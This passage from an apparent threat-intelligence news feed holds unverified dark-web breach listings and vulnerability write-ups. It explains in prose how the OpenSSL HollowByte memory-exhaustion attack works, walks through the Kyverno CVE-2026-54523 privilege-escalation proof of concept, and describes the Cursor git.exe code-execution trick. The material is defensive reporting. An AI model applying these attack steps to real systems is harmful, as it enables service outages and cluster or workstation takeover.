![Georgia flag](https://flagcdn.com/w40/ge.png)Georgia Government / Judiciary Data for Sale ## Georgian Court Systems and the High Council of Justice Allegedly Breached, 5TB of Judiciary Data for Sale A threat actor using the alias **bytetobreach** is advertising the sale of data they claim to have taken from **Georgia's court systems** and the **High Council of Justice of Georgia**. The listing describes roughly **5TB** of material dating back to 2012, said to include court documents and case files along with records relating to **court employees, judges, and lawyers**. The actor also claims to hold backups, configuration files, some source code, and internal documents concerning the infrastructure hosted on the judiciary's networks. The claim is **unverified**. Severity CRITICAL Data\~5TB RangeBack to 2012 Country![Georgia flag](https://flagcdn.com/w40/ge.png)Georgia Actorbytetobreach ### ▣Post details TargetGeorgian courts, High Council of Justice Country![Georgia flag](https://flagcdn.com/w40/ge.png)Georgia SectorGovernment / Judiciary ListingData for sale Volume\~5TB (initial analysis) DataCourt cases, staff, judges, lawyers ObservedJul 17, 2026 Actorbytetobreach ### !Allegedly included - \~5TB of judiciary data - Court documents & case files - Court employee records - Judge-related files - Lawyer-related files - Backups & configuration files - Some source code - Internal infrastructure documents ### ◱Screenshots [ ![Georgian court systems High Council of Justice data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23798569287634982765987236598726359832.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23798569287634982765987236598726359832.png) [ ![Georgian court systems High Council of Justice data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23798569287634982765987236598726359833.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23798569287634982765987236598726359833.png) ### ⚠Potential impact A breach of a national judiciary is among the most consequential kinds of government compromise, because court records can contain sensitive details about litigants, victims, witnesses, and ongoing proceedings, alongside the personal data of judges, lawyers, and court staff. Exposure on this scale creates risks of intimidation, coercion, and interference with justice, as well as identity theft and fraud. The claimed presence of backups, configuration files, source code, and infrastructure documentation would additionally expose how judicial systems are built and defended, aiding further attacks. The claim is unverified. ### iStatus Unverified This is a sale listing that also describes a network intrusion, promoted with multiple distribution and contact channels. It follows a similar listing the same actor posted against a European government agency days earlier. The claim is **unverified** and Georgian judicial authorities have not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### OpenSSL HollowByte Flaw Lets 11-Byte TLS Requests Exhaust Server Memory URL: https://darkwebinformer.com/openssl-hollowbyte-flaw-lets-11-byte-tls-requests-exhaust-server-memory/ Last updated: 2026-07-17T20:50:33.000Z A newly disclosed OpenSSL flaw named HollowByte allows an unauthenticated attacker to exhaust server memory using specially crafted TLS requests containing as little as 11 bytes of data. The denial-of-service issue was discovered by the [Okta Red Team](https://sec.okta.com/articles/2026/06/openssl-hollowbtye-a-dos-hiding-in-11-bytes/), which found that vulnerable OpenSSL versions allocate memory based on an attacker-controlled size declaration before the full TLS handshake message has arrived. Although OpenSSL has released a fix, the project classified the change as a bug or hardening improvement rather than a security vulnerability. HollowByte therefore has no CVE identifier, dedicated security advisory, or explicit entry in the affected release changelogs. ### OpenSSL Trusts an Attacker-Controlled Length Every TLS handshake message begins with a four-byte header. Three of those bytes specify the expected length of the message body that follows. Older OpenSSL versions immediately expand their receive buffer according to that claimed length. The allocation occurs before the server receives the actual message body or verifies that the declared amount of data will ever arrive. An attacker can exploit this behavior by opening a TLS connection and sending an [11-byte payload](https://www.bleepingcomputer.com/news/security/hollowbyte-ddos-flaw-bloats-openssl-server-memory-with-11-byte-payload/) containing a header that claims a much larger message is coming. The vulnerable server can allocate up to 131 KB for the connection and then leave a worker waiting for data the attacker never sends. No authentication, completed TLS session, or key exchange is required. While 131 KB may appear relatively small, the attacker can repeat the request across large numbers of connections while transmitting very little data. ### Freed Memory Remains Trapped HollowByte becomes more disruptive because of the way the GNU C Library, or glibc, manages freed memory. When a malicious connection closes, OpenSSL releases the allocated buffer. However, glibc may retain small and medium-sized allocations for future reuse instead of immediately returning that memory to the operating system. By repeatedly changing the false message length, an attacker can create differently sized memory blocks that the allocator struggles to reuse. This causes the heap to fragment and the server’s [resident memory usage to continue increasing](https://thehackernews.com/2026/07/openssl-hollowbyte-flaw-could-freeze.html) even after the attacking connections have been terminated. Okta said the memory remained unavailable until the affected process was completely restarted. This distinguishes HollowByte from a conventional connection-exhaustion attack. Closing the connections may remove the immediate network load, but it does not necessarily restore the memory consumed during the attack. ### NGINX Server Killed During Testing Okta tested HollowByte against patched and unpatched OpenSSL instances running NGINX. In a server environment with 1 GB of RAM, the unpatched process was killed after approximately [547 MB became trapped in fragmented memory](https://sec.okta.com/articles/2026/06/openssl-hollowbtye-a-dos-hiding-in-11-bytes/). During testing on a system with 16 GB of RAM, the attack locked up around 25% of the server’s total memory while remaining below its configured connection ceiling. This means standard connection-limiting protections may not be sufficient. An attacker does not necessarily need enough simultaneous connections to trigger conventional denial-of-service alerts because memory can remain consumed after earlier connections have already closed. The practical impact depends on the operating system, memory allocator, server configuration, available resources, and how the affected application uses OpenSSL. Okta’s published testing focused on NGINX running with glibc. ### OpenSSL Quietly Shipped a Fix OpenSSL resolved the issue by changing how the TLS receive buffer grows. Instead of immediately trusting the declared message length and allocating the full buffer, OpenSSL now [expands the buffer incrementally](https://github.com/openssl/openssl/pull/30792) as data actually arrives over the connection. A client that claims a large message is coming but sends no additional data can no longer force the same immediate allocation. The correction was included in OpenSSL 4.0.1 and backported to the following releases: - OpenSSL 3.6.3 - OpenSSL 3.5.7 - OpenSSL 3.4.6 - OpenSSL 3.0.21 The fixed versions were published on June 9 as part of broader [OpenSSL security patch releases](https://github.com/openssl/openssl/releases), but HollowByte was not identified in the public release notes. OpenSSL’s own pull request states that the issue was reported to its security team by Okta and that the project decided to handle it only as a “bug or hardening” fix. ### No CVE Complicates Detection The lack of a CVE creates an additional problem for vulnerability management teams. Many organizations depend on CVE identifiers, security advisories, and vendor changelogs to identify affected software. Because HollowByte has none of these, standard vulnerability scanners may not clearly warn administrators that an outdated OpenSSL package remains exposed. OpenSSL is also embedded in a wide range of software, including Apache and NGINX web servers, Node.js and Python runtimes, PHP and Ruby environments, and databases such as MySQL and PostgreSQL. Updating the operating system’s OpenSSL package may not address applications that ship their own bundled copy of the library. Organizations should inventory both system and application-provided OpenSSL versions, update to a fixed release, and monitor unusual increases in resident memory on TLS-terminating services. Systems that experience unexplained memory growth should also be checked for large numbers of incomplete TLS handshakes. Restarting an affected process may recover fragmented memory, but it does not prevent the server from being targeted again. HollowByte demonstrates how a tiny unauthenticated request can create a disproportionate operational impact when foundational software allocates resources based on untrusted input. ### Brazilian Hospital Hospital Di Camp Allegedly Breached, Patient Medical Data Leaked in Staged Release URL: https://darkwebinformer.com/brazilian-hospital-hospital-di-camp-allegedly-breached-patient-medical-data-leaked-in-staged-release/ Last updated: 2026-07-17T20:18:25.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Healthcare Staged Leak ## Brazilian Hospital Hospital Di Camp Allegedly Breached, Patient Medical Data Leaked in Staged Release A threat actor using the alias **doommageddon** claims to have breached **Hospital Di Camp**, a healthcare facility in Campo Grande, Brazil, that has provided medical services for more than 20 years across fields including cardiology, gastroenterology, and orthopedics. The actor says the data will be released in **three waves**, with this first part described as patients' **ECG (electrocardiogram) data**, to be followed by protected health information (PHI) and personal data, and then the hospital's full databases. Download links for the first wave are included in the post. The claim is **unverified**. Severity CRITICAL DataPatient medical Release3 waves (part 1) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Actordoommageddon ### ▣Post details TargetHospital Di Camp (Campo Grande) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorHealthcare ClaimPatient data (staged leak) Part 1Patient ECG data To comePHI, PII, full databases ObservedJul 17, 2026 Actordoommageddon ### !Allegedly included - Patient ECG data (part 1) - Protected health information (PHI) - Patient personal data (PII) - Full hospital databases (to come) - Diagnostic & exam records - Cardiology-related data - Staged 3-wave release - Hospital patient records ### ◱Screenshot [ ![Hospital Di Camp Brazil hospital patient data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/29378562973865982736598726359872354.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/29378562973865982736598726359872354.png) ### ⚠Potential impact Hospital data breaches are among the most damaging because they expose intimate medical information alongside identifying details, and this leak specifically names patients' ECG data, broader protected health information, and eventually the hospital's full databases. Exposure of diagnostic and treatment records can enable medical identity theft, insurance fraud, extortion, and discrimination, and it is difficult or impossible for patients to remediate. Because the actor is releasing the data in stages, the exposure is set to grow with each wave. The claim is unverified. ### iStatus Unverified This is a staged data-leak post, presented as the first of three planned releases, with download links included for the first wave. The claim is **unverified** and Hospital Di Camp has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### One Namespace String to kube-system: Cross-Namespace Privilege Escalation in Kyverno (CVE-2026-54523) URL: https://darkwebinformer.com/one-namespace-string-to-kube-system-cross-namespace-privilege-escalation-in-kyverno-cve-2026-54523/ Last updated: 2026-07-17T18:03:10.000Z Critical CVSS 3.1 9.6 Impact Cluster Privesc Fixed In v1.18.2 # One Namespace String to kube-system: Cross-Namespace Privilege Escalation in Kyverno (CVE-2026-54523) Kyverno Policy Engine • Missing Namespace Authorization • Published 2026-07-13 ## Vulnerability Overview [CVE-2026-54523](https://github.com/kyverno/kyverno/security/advisories/GHSA-79gf-7frw-68m9) (GHSA-79gf-7frw-68m9) is a critical privilege escalation in **Kyverno**, the CNCF Kubernetes policy engine. A tenant who can create a `NamespacedGeneratingPolicy` in their own namespace can instruct Kyverno's background controller to generate resources in *any* namespace by passing an arbitrary namespace string to the CEL function `generator.apply(namespace, resources)`. Because that controller runs with cluster-wide RBAC by default, a low-privileged, namespace-scoped user can mint `RoleBindings` in sensitive namespaces such as `kube-system` and escalate to admin across the cluster. It is scored **CVSS 3.1 9.6 (Critical)**, affects all versions up to and including `v1.18.1`, and is fixed in `v1.18.2`. Bottom Line If you run Kyverno at or below v1.18.1 and grant any non-cluster-admin user the ability to create `NamespacedGeneratingPolicy` objects, that user can escalate to admin in any namespace. Upgrade to v1.18.2, and until you do, restrict who can create these policies. CVE ID CVE-2026-54523 CVSS Score 9.6 - Critical Weakness Missing Authorization Affected Product Kyverno Affected Versions ≤ v1.18.1 Attacker Position Low-Priv Tenant Exploit Status PoC in Advisory Fixed In v1.18.2 ## Why This Matters Kyverno is a widely adopted policy engine that sits inside the Kubernetes control plane, validating, mutating, and generating resources. To do the generation part of its job, its background controller is granted broad, cluster-wide permissions by default. In a multi-tenant cluster, the entire security model depends on namespace boundaries holding: a tenant scoped to their own namespace must not be able to act outside it. This flaw breaks exactly that guarantee. It turns a privileged, trusted internal component into a confused deputy that will carry out a low-privileged tenant's instructions anywhere in the cluster, which is one of the most damaging failure modes in a shared Kubernetes environment. ## Technical Analysis The root cause is a missing namespace check on attacker-controlled input. In `pkg/cel/libs/context.go`, the function `GenerateResources(namespace string, dataList)` receives its `namespace` argument straight from the CEL expression `generator.apply("", [...])` by way of the Kyverno SDK binding, with no validation that the target namespace is the policy's own. The admission validator for `NamespacedGeneratingPolicy` (`pkg/cel/policies/gpol/validate.go`) only confirms that the policy compiles and that `matchConstraints` is non-empty; it never checks the namespace argument at admission or execution time. What makes this a clear oversight rather than a design tradeoff is that Kyverno already guards the equivalent boundary elsewhere. The ConfigMap loader (`pkg/engine/context/loaders/configmap.go`) rejects cross-namespace references for namespaced policies, and the API call path (`pkg/engine/apicall/apicall.go`) enforces a namespace match via regex. `GenerateResources` has neither guard. Meanwhile the background-controller ClusterRole ships, by default, with cluster-wide `create/update/patch/delete` on `rolebindings` and `roles`, plus `configmaps`, `networkpolicies`, and related resources. Combine an unvalidated target namespace with a deputy that holds cluster-wide RBAC, and a tenant's policy becomes a lever on the whole cluster. ## Proof of Concept The advisory includes a complete reproduction. An attacker with `create` on `namespacedgeneratingpolicies` in a tenant namespace defines a `NamespacedGeneratingPolicy` whose generation expression calls `generator.apply("kube-system", [...])` to create a `RoleBinding` that grants the built-in `admin` `ClusterRole` to the attacker's own `ServiceAccount`. The policy is set to trigger on ConfigMap creation, so the attacker simply creates any `ConfigMap` in their own namespace. Kyverno's background controller then executes the generation and creates the `RoleBinding` in `kube-system`, handing the attacker's service account admin rights in that namespace. The escalation requires nothing beyond the tenant-level permission to author the policy. ## Impact A namespace-scoped user with `create` on `NamespacedGeneratingPolicy` can create `Roles` and `RoleBindings` in any namespace, riding the background controller's cluster-wide RBAC, and on a default Helm install this yields admin in any namespace including `kube-system`. The same primitive allows creating arbitrary `ConfigMaps`, `NetworkPolicies`, and `Ingresses` cluster-wide, which extends the blast radius to configuration tampering and traffic manipulation. Any installation that grants non-admin users the ability to create `NamespacedGeneratingPolicy` objects is affected. ## Affected & Fixed Versions | Kyverno Version | Status | Resolution | | --------------- | ---------- | ------------------------------------------------------------------------- | | ≤ v1.18.1 | Vulnerable | Upgrade to v1.18.2 | | v1.18.2 | Fixed | Enforces that the generator target namespace matches the policy namespace | ## Mitigation & Remediation Guidance drawn from the [Kyverno security advisory](https://github.com/kyverno/kyverno/security/advisories/GHSA-79gf-7frw-68m9): 1. **Upgrade to v1.18.2.** The patched release adds the missing namespace enforcement so a `NamespacedGeneratingPolicy` can no longer target a namespace other than its own. This is the complete fix. 2. **Restrict who can create these policies.** Until patched, tightly limit RBAC so that only trusted, cluster-admin-equivalent principals can create `NamespacedGeneratingPolicy` objects. The vulnerability is only reachable by users granted that permission. 3. **Audit existing policies.** Review current `NamespacedGeneratingPolicy` objects for any `generator.apply()` call whose target namespace differs from the policy's own namespace, which would indicate attempted or actual cross-namespace generation. 4. **Constrain and monitor the controller.** Where feasible, review and scope the background-controller ClusterRole, and alert on unexpected `Role` and `RoleBinding` creation in sensitive namespaces such as `kube-system`. ## The Bigger Picture CVE-2026-54523 is a clean example of the confused-deputy problem in Kubernetes: the danger is not that the attacker has power, but that a powerful, trusted component will act on the attacker's behalf without checking whether it should. Policy engines are especially exposed to this because their whole purpose is to hold broad privileges and act on cluster resources, so any gap in how they validate tenant-supplied input converts directly into cluster-wide impact. The CEL-driven generation feature made a new, attacker-influenced input (a target namespace) reachable, and the authorization check that existed for sibling features was simply not applied here. The durable lessons: validate every tenant-controlled parameter at the trust boundary, keep privileged controllers on least-privilege RBAC rather than defaulting to cluster-wide grants, and gate powerful policy primitives behind admin-only RBAC in multi-tenant clusters. ## References - [Kyverno Security Advisory - GHSA-79gf-7frw-68m9](https://github.com/kyverno/kyverno/security/advisories/GHSA-79gf-7frw-68m9) - [CVE.org - CVE-2026-54523 Record](https://www.cve.org/CVERecord?id=CVE-2026-54523) - [NVD - CVE-2026-54523](https://nvd.nist.gov/vuln/detail/CVE-2026-54523) - [Kyverno - Releases (v1.18.2)](https://github.com/kyverno/kyverno/releases) - [Kyverno - Project Site](https://kyverno.io) ### Brazilian Online Store Loja Negócios Digital Allegedly Breached, 20,000 Customer Records Exposed URL: https://darkwebinformer.com/brazilian-online-store-loja-negocios-digital-allegedly-breached-20-000-customer-records-exposed/ Last updated: 2026-07-17T15:44:18.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil E-commerce / Retail Data for Sale ## Brazilian Online Store Loja Negócios Digital Allegedly Breached, 20,000 Customer Records Exposed A threat actor using the alias **Sensitive2025** is advertising a database they claim to have stolen from **Loja Negócios Digital** (lojanegociosdigital.com.br), a Brazilian online store. The listing describes roughly **20,000 records** exported from the store's WooCommerce back end, offered both as a points-gated download and for direct sale. According to the sample, the data spans multiple tables covering customer accounts, orders, and billing details, and includes names, email addresses, phone numbers, billing and shipping addresses, order and payment information, IP addresses, and **hashed account passwords**. The claim is **unverified**. Severity HIGH Data\~20,000 records TypeStore / WooCommerce Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil ActorSensitive2025 ### ▣Post details TargetLoja Negócios Digital (lojanegociosdigital.com.br) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil SectorE-commerce / Retail Claim\~20,000 records DataAccounts, orders, billing, hashes AccessPoints-gated + for sale ObservedJul 17, 2026 ActorSensitive2025 ### !Allegedly included - \~20,000 records - Customer names & emails - Phone numbers - Billing & shipping addresses - Order & payment details - IP addresses - Hashed account passwords - WooCommerce user accounts ### ◱Screenshots [ ![Loja Negócios Digital Brazilian online store data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/48932752983756928735698273597862359786.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/48932752983756928735698273597862359786.png) [ ![Loja Negócios Digital Brazilian online store data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/48932752983756928735698273597862359787.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/48932752983756928735698273597862359787.png) ### ⚠Potential impact A full store-database export ties customers' names to their email addresses, phone numbers, home addresses, and order histories, while the hashed account passwords could be cracked to take over accounts or be reused elsewhere. Order and payment metadata combined with IP addresses adds detail that makes phishing and fraud more convincing and harder to spot. For a Brazilian retailer this exposes both shoppers and registered users to identity theft, account compromise, and targeted scams. The claim is unverified. ### iStatus Unverified This is a data-leak listing offered as a points-gated download and separately for direct sale through the actor's messaging contact. The claim is **unverified** and the store has not publicly addressed it. Want everything on this breach, including the unblurred screenshots? **Paid subscribers** get the full claim details, breach URL, and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Firefighters Federation Membership Platform Allegedly Breached, Data on Nearly 125,000 Members Leaked URL: https://darkwebinformer.com/french-firefighters-federation-membership-platform-allegedly-breached-data-on-nearly-125-000-members-leaked/ Last updated: 2026-07-16T17:53:41.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Emergency Services Involves Minors ## French Firefighters Federation Membership Platform Allegedly Breached, Data on Nearly 125,000 Members Leaked A threat actor using the alias **ChimeraZ** claims to be leaking a database from the **French Firefighters Federation** (Fédération nationale des sapeurs-pompiers de France), specifically its official online membership platform (pompiers.fr). The listing describes **415,326 lines covering 124,807 people**, in CSV and JSON format, offered as a free download. According to the sample, the data spans member records across several tables and includes names, roles and grades, email addresses, phone numbers, and login identifiers, along with memo fields that contain **parent or guardian contact details**, suggesting some records relate to youth members. The claim is **unverified**. Severity HIGH People124,807 Lines415,326 Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetFrench Firefighters Federation (pompiers.fr) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEmergency Services Claim124,807 people / 415,326 lines FormatCSV / JSON, 29MB AccessFree download ObservedJul 16, 2026 ActorChimeraZ ### !Allegedly included - 124,807 people - Member names - Roles, functions & grades - Email addresses - Phone numbers - Login identifiers - Parent / guardian contacts - Internal memos ### ◱Screenshot [ ![French Firefighters Federation (pompiers.fr) membership data breach forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7892356987216349876235987235987623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/7892356987216349876235987235987623.png) ### ⚠Potential impact Exposing the membership of a national firefighters federation ties names to roles, grades, and contact details across nearly 125,000 people, which enables targeted phishing and impersonation and carries added sensitivity given the members' emergency-services affiliation. The presence of parent or guardian contact details points to youth members among those affected, raising child-safety concerns around the exposure of minors and their families. Offered as a free download across many mirrors, any exposed data should be treated as widely circulating. The claim is unverified. ### iStatus Unverified This is a free-download leak posted with multiple mirror links. This is the same alias seen in other recent French leaks. The claim is **unverified** and the federation has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Slovak Fitness Brand NEBBIA Allegedly Breached, Over 32,000 Customer Records Leaked With More Threatened URL: https://darkwebinformer.com/slovak-fitness-brand-nebbia-allegedly-breached-over-32-000-customer-records-leaked-with-more-threatened/ Last updated: 2026-07-16T15:40:51.000Z Breach Report ![Slovakia flag](https://flagcdn.com/w40/sk.png)Slovakia Retail / E-commerce More Threatened ## Slovak Fitness Brand NEBBIA Allegedly Breached, Over 32,000 Customer Records Leaked With More Threatened A threat actor using the alias **iProfessor** claims to have breached **NEBBIA** (nebbia.fitness), a premium fitness-apparel and activewear brand headquartered in Žilina, Slovakia, that sells internationally through its online store. The actor is sharing **32,340 order-related documents** now and threatens to release a further 285,662 records. According to the post, the data covers customers across Europe and includes full names, billing and shipping addresses, phone numbers, email addresses, and order details such as items purchased, amounts paid, and payment method, along with packing slips and invoices. The claim is **unverified**. Severity MEDIUM Data now32,340 docs Threatened+285,662 Country![Slovakia flag](https://flagcdn.com/w40/sk.png)Slovakia ActoriProfessor ### ▣Post details TargetNEBBIA (nebbia.fitness) Country![Slovakia flag](https://flagcdn.com/w40/sk.png)Slovakia SectorRetail / E-commerce Claim32,340 documents now Threatened\~285,662 more DataCustomer, order, shipping, invoices ObservedJul 16, 2026 ActoriProfessor ### !Allegedly included - 32,340 order documents (now) - \~285,662 more threatened - Full customer names - Billing & shipping addresses - Phone numbers & emails - Order & payment details - Packing slips & invoices - Shipping labels ### ◱Screenshots [ ![NEBBIA Slovak fitness apparel data breach forum post screenshot, July 2026 (1 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723563.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723563.png) [ ![NEBBIA Slovak fitness apparel data breach forum post screenshot, July 2026 (2 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723564.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723564.png) [ ![NEBBIA Slovak fitness apparel data breach forum post screenshot, July 2026 (3 of 3)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723565.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/07/23985729873652897656987236589723565.png) ### ⚠Potential impact Customer and order data of this kind ties names to home billing and shipping addresses, phone numbers, and purchase histories, which supports targeted phishing, delivery and refund scams, and physical-privacy risks. Packing slips and invoices add further verifiable detail that makes fraud attempts more convincing. With the actor threatening to release nearly 286,000 additional records, the exposure could grow substantially beyond the initial batch. The claim is unverified. ### iStatus Unverified This is a data-leak post with samples reply-gated and the full download gated behind forum points. The actor accompanies the leak with antisemitic language and personal attacks on the company's founders. The claim is **unverified** and NEBBIA has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Unpatched Cursor Zero-Day Lets Malicious Git Repositories Trigger Windows Code Execution URL: https://darkwebinformer.com/unpatched-cursor-zero-day-lets-malicious-git-repositories-trigger-windows-code-execution/ Last updated: 2026-07-15T16:40:08.000Z Security researchers have disclosed an unpatched Cursor vulnerability that can allow a malicious Git repository to execute attacker-controlled code automatically when opened on a Windows system. The flaw does not involve prompt injection, an AI agent, or manipulation of a language model. According to [Mindgard’s technical disclosure](https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left), the only required user action is opening a project containing a malicious executable named `git.exe` in its root directory. ### Cursor Executes Git From the Workspace When Cursor loads a project, it attempts to locate a Git executable across several possible locations. One of the locations searched is the current workspace. An attacker can exploit this behavior by placing a malicious `git.exe` file inside a repository. When the victim opens that repository, Cursor may treat the attacker-controlled file as the legitimate Git binary and execute it without displaying an approval dialog or warning. Mindgard demonstrated the issue using [Windows Calculator renamed to git.exe](https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left). Opening the project caused Cursor to launch Calculator automatically and continue launching additional instances while the workspace remained open. Process Monitor logs showed `Cursor.exe` spawning the repository-controlled executable using the command: `git rev-parse --show-toplevel` In a real attack, the harmless Calculator demonstration could be replaced with malware capable of stealing credentials, deploying ransomware, installing a backdoor, or accessing source code and development secrets under the current user’s privileges. ### No Prompt or AI Interaction Required Unlike many recently disclosed AI coding assistant vulnerabilities, this attack does not require the Cursor agent to read malicious instructions or approve a command. The [code-execution path occurs during normal project loading](https://www.securityweek.com/unpatched-cursor-vulnerability-exposes-users-to-code-execution/), before the developer needs to interact with the repository’s contents. There are no confirmation prompts, authorization requests, or visible indications that executable content inside the workspace is being launched. Cursor may also invoke the malicious file repeatedly as it performs background Git operations, allowing the payload to run more than once while the repository remains open. ### Reported Seven Months Before Disclosure Mindgard discovered and reported the vulnerability to Cursor on December 15, 2025. The researchers said an internal automation failure initially prevented their report from reaching Cursor’s private HackerOne program. The report was later resubmitted, initially closed as informational, and reopened after HackerOne reproduced the issue. Mindgard subsequently sent multiple requests for an update but said it received no meaningful information about remediation. The firm publicly disclosed the vulnerability on July 14, 2026, after [more than seven months of attempted coordination](https://mindgard.ai/blog/cursor-0day-when-full-disclosure-becomes-the-only-protection-left). The public technical evidence identifies Cursor 3.2.16 on Windows as the last specifically documented affected version, tested on April 30\. Mindgard says the vulnerability remained present after more than 197 Cursor releases, but its disclosure does not identify the exact version used for its most recent test. As of July 15, Cursor had not published a security advisory identifying a fixed release, and [no CVE had been assigned](https://thehackernews.com/2026/07/cursor-flaw-lets-malicious-cloned.html). ### Temporary Mitigations Until Cursor publishes a confirmed patch, developers should avoid opening unknown or newly cloned repositories directly on their primary Windows environment. Untrusted projects should instead be inspected inside Windows Sandbox, a disposable virtual machine, or another isolated development environment. Security teams can also use AppLocker or Windows Defender Application Control to block executables such as `git.exe` from running inside repository and workspace directories. Because attacker-supplied files can have different hashes, Mindgard recommends using path-based restrictions rather than relying only on hash blocklists. Organizations with endpoint detection and response capabilities should also monitor for unusual child processes launched by `Cursor.exe`, especially executables originating from source-code directories. The vulnerability highlights a broader development security risk: cloning and opening a repository should not automatically grant executable content inside that repository permission to run. Developer workstations frequently contain source code, API keys, cloud credentials, SSH keys, and access to production infrastructure, making them valuable targets for poisoned-repository attacks. ### Romanian Land Registry Agency ANCPI Allegedly Breached and Hit With Ransomware, Citizen Data and Source Code for Sale URL: https://darkwebinformer.com/romanian-land-registry-agency-ancpi-allegedly-breached-and-hit-with-ransomware-citizen-data-and-source-code-for-sale/ Last updated: 2026-07-15T16:25:53.000Z Breach Report ![Romania flag](https://flagcdn.com/w40/ro.png)Romania Government Ransomware ## Romanian Land Registry Agency ANCPI Allegedly Breached and Hit With Ransomware, Citizen Data and Source Code for Sale A threat actor using the alias **bytetobreach** is advertising the sale of data they claim to have stolen from **ANCPI**, Romania's National Agency for Cadastre and Land Registration, which maintains the country's land-registry and property records. The actor describes a wide-ranging compromise of ANCPI's internal networks, claiming to have taken citizens' cadastre data along with a copy of the agency's source-code repositories for its core systems, and to have deployed **ransomware**. The actor links the incident to a recent government announcement that ANCPI's IT systems were shut down. The claim is **unverified**. Severity CRITICAL ScopeFull network DataRecords + source code Country![Romania flag](https://flagcdn.com/w40/ro.png)Romania Actorbytetobreach ### ▣Post details TargetANCPI (land registry, gov) Country![Romania flag](https://flagcdn.com/w40/ro.png)Romania SectorGovernment ListingData for sale DataCadastre records, source code ImpactRansomware, IT shutdown claimed ObservedJul 14, 2026 Actorbytetobreach ### !Allegedly included - Romanian citizens' cadastre data - Land-registry / property records - Internal databases - Source-code repositories - Core system source code - Ransomware deployment (claimed) - Linked to a government IT shutdown - Offered for sale ### ◱Screenshot [ ![ANCPI Romania land registry data breach forum post screenshot, July 